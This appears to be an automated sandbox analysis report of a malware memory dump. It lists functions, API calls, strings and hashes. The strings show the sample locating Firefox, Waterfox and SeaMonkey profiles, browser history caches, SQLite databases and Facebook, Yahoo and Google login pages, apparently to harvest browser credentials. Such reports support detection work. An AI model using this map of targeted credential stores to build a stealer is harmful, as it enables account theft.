                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                • _snwprintf.MSVCRT ref: 0040E257
                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                • API String ID: 2804212203-2982631422
                                                • Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                • Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                  • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                • memset.MSVCRT ref: 0040BC75
                                                • memset.MSVCRT ref: 0040BC8C
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                • memcmp.MSVCRT ref: 0040BCD6
                                                • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                • String ID:
                                                • API String ID: 115830560-3916222277
                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                • String ID: r!A
                                                • API String ID: 2791114272-628097481
                                                • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                • _wcslwr.MSVCRT ref: 0040C817
                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                • wcslen.MSVCRT ref: 0040C82C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                • API String ID: 2936932814-4196376884
                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                • String ID: BIN
                                                • API String ID: 1668488027-1015027815
                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 00403CBF
                                                • memset.MSVCRT ref: 00403CD4
                                                • memset.MSVCRT ref: 00403CE9
                                                • memset.MSVCRT ref: 00403CFE
                                                • memset.MSVCRT ref: 00403D13
                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                • memset.MSVCRT ref: 00403DDA
                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                • String ID: Waterfox$Waterfox\Profiles
                                                • API String ID: 4039892925-11920434
                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 00403E50
                                                • memset.MSVCRT ref: 00403E65
                                                • memset.MSVCRT ref: 00403E7A
                                                • memset.MSVCRT ref: 00403E8F
                                                • memset.MSVCRT ref: 00403EA4
                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                • memset.MSVCRT ref: 00403F6B
                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                • API String ID: 4039892925-2068335096
                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 00403FE1
                                                • memset.MSVCRT ref: 00403FF6
                                                • memset.MSVCRT ref: 0040400B
                                                • memset.MSVCRT ref: 00404020
                                                • memset.MSVCRT ref: 00404035
                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                • memset.MSVCRT ref: 004040FC
                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                • API String ID: 4039892925-3369679110
                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                Download Yara Rule
                                                APIs
                                                • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpy
                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                • API String ID: 3510742995-2641926074
                                                • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                • GetLastError.KERNEL32 ref: 0041847E
                                                • free.MSVCRT ref: 0041848B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CreateErrorFileLastfree
                                                • String ID: |A
                                                • API String ID: 981974120-1717621600
                                                • Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                • Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                • memset.MSVCRT ref: 004033B7
                                                • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                • wcscmp.MSVCRT ref: 004033FC
                                                • _wcsicmp.MSVCRT ref: 00403439
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                • String ID: $0.@
                                                • API String ID: 2758756878-1896041820
                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 00403C09
                                                • memset.MSVCRT ref: 00403C1E
                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                • wcscat.MSVCRT ref: 00403C47
                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                • wcscat.MSVCRT ref: 00403C70
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                • API String ID: 1534475566-1174173950
                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                • String ID:
                                                • API String ID: 669240632-0
                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                • memset.MSVCRT ref: 00414C87
                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                • wcscpy.MSVCRT ref: 00414CFC
                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                • API String ID: 2925649097-2036018995
                                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                Download Yara Rule
                                                APIs
                                                • wcschr.MSVCRT ref: 00414458
                                                • _snwprintf.MSVCRT ref: 0041447D
                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                • String ID: "%s"
                                                • API String ID: 1343145685-3297466227
                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 004087D6
                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                • memset.MSVCRT ref: 00408828
                                                • memset.MSVCRT ref: 00408840
                                                • memset.MSVCRT ref: 00408858
                                                • memset.MSVCRT ref: 00408870
                                                • memset.MSVCRT ref: 00408888
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                • String ID:
                                                • API String ID: 2911713577-0
                                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcmp
                                                • String ID: @ $SQLite format 3
                                                • API String ID: 1475443563-3708268960
